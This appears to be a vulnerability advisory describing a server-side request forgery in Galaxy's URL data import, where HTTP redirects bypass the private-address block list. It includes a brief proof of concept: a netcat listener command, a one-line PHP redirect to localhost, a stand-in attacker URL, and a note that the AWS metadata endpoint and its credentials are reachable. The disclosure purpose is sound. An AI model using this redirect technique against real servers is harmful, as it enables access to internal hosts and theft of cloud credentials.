Summary

A server-side request forgery which allows a malicious to issue arbitrary HTTP/HTTPS requests from the application server to internal hosts and read their responses.

Details

During a data import users can specify a URL to import data, after the user attempts to import the data the URL is parsed as per:

https://github.com/galaxyproject/galaxy/blob/06d56c859713b74f1c2e35da1c2fcbbf0a965645/lib/galaxy/files/uris.py

Which parses the URL to obtain its host name as well its port number, the parsed URL is then compared to any in the block list. If the hostname equals to any IP address in the block list it will deny access. For example private address such as 127.0.0.1, 169.254.169.254 will deny access.

The Galaxy server uses Python-urllib/3.7 to make HTTP/HTTPS requests when importing data from a URL. By default urllib follows any HTTP/HTTPS redirects which allows an attacker to bypass the current security implementations by using a PHP redirect.

PoC

1. Firstly on the galaxy server start a netcat listener using the following command (This is used to show that the HTTP request is being redirect to the localhost):

nc -lnvvp 9000 

2. Next as the attacker host the following PHP script which can be accessed publicly:

<?php header('Location: http://127.0.0.1:9000', TRUE, 301); ?>

3. Next logon to the Galaxy site and select the upload button.

4. Lastly paste in the url where your PHP script is hosted and click import:
   e.g: http://attacker.net/redirect.php

5. If you go back to your terminal you will see the netcat listener received a request.

Its also possible to redirect to the AWS metadata endpoint and read the AWS credentials as well as Alibaba Cloud instances. This does not affect Google Cloud/Microsoft Azure as those require specific headers to present

Impact

An attacker is able to issue arbitrary HTTP/HTTPS requests to internal hosts and read their responses.

Proof-of-Concept: